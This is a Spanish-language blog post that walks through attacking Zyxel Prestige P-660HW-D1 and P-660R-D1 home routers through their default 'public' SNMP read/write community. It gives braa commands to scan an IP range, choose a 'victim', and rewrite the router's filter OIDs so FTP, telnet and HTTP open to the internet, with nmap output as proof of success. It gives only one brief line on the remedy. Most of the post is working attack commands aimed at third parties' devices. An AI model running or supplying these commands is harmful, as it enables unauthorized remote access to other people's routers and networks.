Esta web utiliza cookies, puedes ver nuestra política de cookies, aquí Si continuas navegando estás aceptándola

SNMP por defecto PrestigeP660HWD1


Hola amigos, en esta ocasión traigo material de primera ;), se trata de como modificar reglas de filtrado en los routers Zyxel Prestige P-660HW-D1, P-660R-D1 por SNMP.

Estos equipos vienen configurados con una community por defecto tanto para lectura como para escritura, de esta forma se puede llegar a configurar el dispositivo por SNMP de forma remota.

Para empezar vamos a bajarnos y compilar la herramienta braa, se trata de un scanner SNMP.

emerge -av net-analyzer/braa

Ahora que ya tenemos braa en nuestro sistema, pedimos un OID a un rango de direcciones, este OID es para pedir el nombre del sistema a los equipos de Zyxel(cada fabricante emplea su propia MIB).

braa public@88.18.11.1-88.18.11.254:161:.1.3.6.1.2.1.1.1.0

Ahora solo falta seleccionar a la victima.
Comprobamos que los puertos estan cerrados:

nmap -p 80,21,23 88.22.xyz.100
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Ahora los abrimos.
Para los modelos P-660HW-D1:

braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81 --> Abrimos el puerto 80
braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22 --> Abrimos el puerto 21
braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24 --> Abrimos el puerto 23

Se puede deducir que sigue la lógica de puerto+1, queremos abrir el puerto 80 --> i"puerto+1" --> i80+1 --> i81

Comprobamos que realmente estan abiertos:

nmap -p 80,21,23 88.22.xyz.100
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:09 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Para dejarlo como antes:

braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23

Comprobamos que vuelven a estar cerrados.

nmap -p 80,21,23 88.22.xyz.100
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Ya veis parece increible pero puedo dar fe de que funciona ;)

En el modelo P-660R-D1

braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81
braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23

Para remediar toda esta historia habrá que configurar SNMP con alguna community menos conocida, jejeje

La gente no suele cambiar la password por defecto de los routers caseros ya que deshabilitan el acceso en la interfaz WAN, pero de este modo BANG!! estamos dentro.


Autor: Kr0m -- 15/08/2013 04:36:28